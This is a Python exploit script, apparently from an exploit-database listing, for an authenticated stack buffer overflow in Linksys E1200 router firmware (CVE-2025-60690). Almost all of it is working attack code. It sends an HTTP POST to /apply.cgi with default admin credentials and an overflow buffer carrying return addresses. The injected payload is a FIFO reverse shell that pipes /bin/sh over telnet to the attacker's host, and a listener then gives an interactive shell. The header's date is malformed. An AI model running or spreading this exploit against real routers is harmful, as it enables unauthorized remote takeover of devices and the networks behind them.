# Exploit Title: Linksys E1200 2.0.04 - Authenticated Stack Buffer Overflow (RCE)
# Date: 2026-15-03
# Exploit Author: JarrettgxzSec
# Vendor Homepage: www.linksys.com
# Version: FW <= v2.0.04
# Tested on: v2.0.02 & v2.0.04, directly connected to the LAN
# CVE: CVE-2025-60690
# Github repository: https://github.com/Jarrettgohxz/CVE-research/tree/main/Linksys/E1200-V2/CVE-2025-60690
import sys
import socket
import threading
import time
from urllib.parse import quote
print('[!] Please refer to the README (comments at the top of this script) to understand the affected firmware versions for CVE-2025-60690, and for which this exploit script will work on\n')
if len(sys.argv) != 3:
print(f"[!] Usage: python3 {sys.argv[0]} <ATTACKER_IP> <TARGET_IP>")
print(f"[!] Example: python3 {sys.argv[0]} 192.168.1.100 192.168.1.1\n")
sys.exit(1)
TARGET_IP = sys.argv[2]
TARGET_PORT = 80
ATTACKER_IP = sys.argv[1]
SHELL_PORT = 8888
def start_shell_listener():
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind(('0.0.0.0', SHELL_PORT))
print(f"[*] Listening for shell on port {SHELL_PORT}...")
s.listen(1)
conn, addr = s.accept()
print(f"[+] Connection received from {addr[0]}")
# allows interactive interaction
conn.setblocking(True)
conn.settimeout(0.5)
while True:
# send command to the router
cmd = input("# ")
conn.send((cmd + "\n").encode())
# receive output from the router
try:
while True:
# keep reading until the device stops sending
chunk = conn.recv(4096).decode(errors='ignore')
if not chunk:
print("\n[!] Connection closed by target.")
return
print(chunk, end="", flush=True)
# timeout decided by the conn.settimeout() method previously
except socket.timeout:
# this is expected when the device is done sending text
pass
def execute_exploit():
print(f"[*] Connecting to {TARGET_IP}:{TARGET_PORT}...")
# Construct the shell payload
payload = "rm /tmp/f \n"
payload += "mkfifo /tmp/f \n"
payload += "killall httpd && httpd \n"
payload += f"cat /tmp/f | /bin/sh 2>&1 | telnet {ATTACKER_IP} {SHELL_PORT} > /tmp/f"
payload = quote(f" {payload}")
# Construct the exploit payload
data = b"action=Apply&lan_netmask=&lan_ipaddr=4&lan_ipaddr_0=x&lan_ipaddr_1=x&lan_ipaddr_2=x&lan_ipaddr_3="
data += b"A"*74 + b"\xa0\x1e\xd6\x2a" + b"A"*24 + b"\x44\xa0\xd6\x2a" + b"A"*72 + b"\xfc\xd8\xd4\x2a" + b"A"*28
data += payload.encode()
# Construct the raw HTTP POST body
content_length = len(data)
http_req = f"POST /apply.cgi HTTP/1.1\r\n"
http_req += f"Host: {TARGET_IP}\r\n"
http_req += "Content-Type: application/x-www-form-urlencoded\r\n"
http_req += "Authorization: Basic YWRtaW46YWRtaW4=\r\n"
http_req += f"Content-Length: {content_length}\r\n"
http_req += "\r\n"
http_req = http_req.encode() + data
try:
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.settimeout(10)
s.connect((TARGET_IP, TARGET_PORT))
s.sendall(http_req)
except Exception as e:
print(f"[!] Error: {e}")
if __name__ == "__main__":
# start the shell listener in the background
listener_thread = threading.Thread(target=start_shell_listener)
listener_thread.daemon = True
listener_thread.start()
# short sleep to ensure the listener is bound and ready
time.sleep(1)
# execute the exploit function
execute_exploit()
# keep main thread alive to interact with the shell
while listener_thread.is_alive():
time.sleep(1)
